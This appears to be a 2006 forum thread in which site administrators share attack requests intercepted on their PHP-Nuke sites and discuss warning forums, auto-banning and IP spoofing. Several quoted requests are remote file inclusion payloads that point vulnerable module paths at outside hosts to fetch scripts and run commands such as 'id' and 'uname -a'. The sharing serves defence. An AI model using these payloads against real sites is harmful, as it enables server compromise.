attacking AllMyGuests

Sells PC To Pay For Divorce Joined: Posts: 5661

Ok peeps,,
perhaps raven agrees its a good idea to open a special forum for these warnings...,but untill them ill post them here...
Just recieved this attack,useless to me cause i dont have AllMyGuests installed...

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

Posted: Mon Mar 13, 2006 5:39 pm

Good to know Smile

I'll add everything I've seen if Raven wants to open a place to report them

Posted: Mon Mar 13, 2006 5:48 pm

yes i did asked him to open a special forum for this...as he wanted to know more info on the idea i gave him that by pm.
Just have to wait what he thinks of it.

Posted: Mon Mar 13, 2006 6:15 pm

Would be great to find an ultimate solution for this problem.

Site Admin Joined: Jun 04, 2004 Posts: 6433

Got my finger on the trigger, just point me in the right direction...just kidding!

Posted: Tue Mar 14, 2006 12:54 am

Here are a couple I intercepted just within the last 24 hours;

Quote:

/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.adxteam.ru/modules/tool25.dat?cmd=id

Quote:

/modules/My_eGallery/index.php?basepath=http://www.adxteam.ru/modules/tool25.dat?cmd=id

Quote:

/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id

Quote:

/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

I have been mulling this over since I got your PM. My main concern with this is that we would become a central repository for every script kiddie that gets a new 'puter from Mommy and Daddy.

Posted: Tue Mar 14, 2006 4:13 am

I understand raven...
But there must be a way to do this,by making the forum for registered users....
And script kiddies usualy fail with their wannabe attemps..
And....sure we can post it in a way that we dont publish the full used url/directory.
Thing is also ,if you would use google you can find a lot on the web ,i think they wont gonna use this site to get resources or examples.

Were just publishing the way wannabe's used to do something.
what not will be published is the actual url/directory and dont forget that the actual script used isnt published also.

Posted: Tue Mar 14, 2006 8:27 am

Aye - script kiddies can just Google for the vulnerability though. I Google all the 404s I get, and the vulnerabilities pop right up to the top.

Perhaps a way to encrypt the search strings so that script kiddies can't read them directly? Integrate it into a distribution of Sentinel or another protection script.

Just report the IP hitting the site then? I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malacious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities.

Posted: Tue Mar 14, 2006 8:40 am

well im just talking about attacks on any nuke related mods...like i just posted a few..not actual attack scripts..
to post a few examples they have tried...

Code:




modules/My_eGallery/public 


modules/4nAlbum/public/


modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR 


modules/agendax/addevent.inc.php?agendax_path 


modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Whoever reads this,keep in mind that the posted here was the actual target but in combination with certain scripts.
Like its posted now has no value whatsoever,but is merely to point out the stuff you should keep an eye on.

Posted: Tue Mar 14, 2006 8:58 am

evaders99 wrote:

<snipped> I'm using a very simple 404 redirect to do an autoban of vulnerabilities I've found hitting my site. These are obviously malacious attacks, so I have no qualms about banning the address. They will keep trying with other vulnerabilities.

But wouldnt this mean that if the IP was spoofed, it could potentially ban a legitimate IP?

Posted: Tue Mar 14, 2006 11:39 am

How is the IP spoofed? Either is it is a direct attacker or something going through a compromised server or known proxy

Posted: Wed Mar 15, 2006 12:35 am

It is my understanding (please correct me if I am wrong) that by modifying a data packet header that it is possible to present an IP which is not neccessarily the same as the true or proxy IP - in other words that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if for example, the IP address of googles search bots were presented during a number of attack attempts, Sentinel would then end up banning google from your site.

Posted: Wed Mar 15, 2006 8:36 am

I haven't seen the technology available to do so. But any kind of software can be fiddled with.

I've only had a couple hundred bans though, few from western countries. I definitely report those to the ISP. Others are just known robots from Turkey, China, Brazil...

Posted: Wed Mar 15, 2006 8:48 am

Guardian2003 wrote:

It is my understanding (please correct me if I am wrong) that by modifying a data packet header that it is possible to present an IP which is not neccessarily the same as the true or proxy IP - in other words that the IP address can be presented as anything a potential hacker wants you to think it is.
If it is possible to forge an IP address in this way, then if for example, the IP address of googles search bots were presented during a number of attack attempts, Sentinel would then end up banning google from your site.

You are quite correct. IP Spoofing is a common tactic. Normally these scripts are wriiten in perl.

Posted: Wed Mar 15, 2006 10:46 am

Ah so I'm reading, IP spoofing is more directed at DOS attacks. But it is certainly possible for people to use this to hide their hacking

Here's to all the headaches that hackers cause... gah.
Now to write some code to block automatically with Sentinel and I'll be set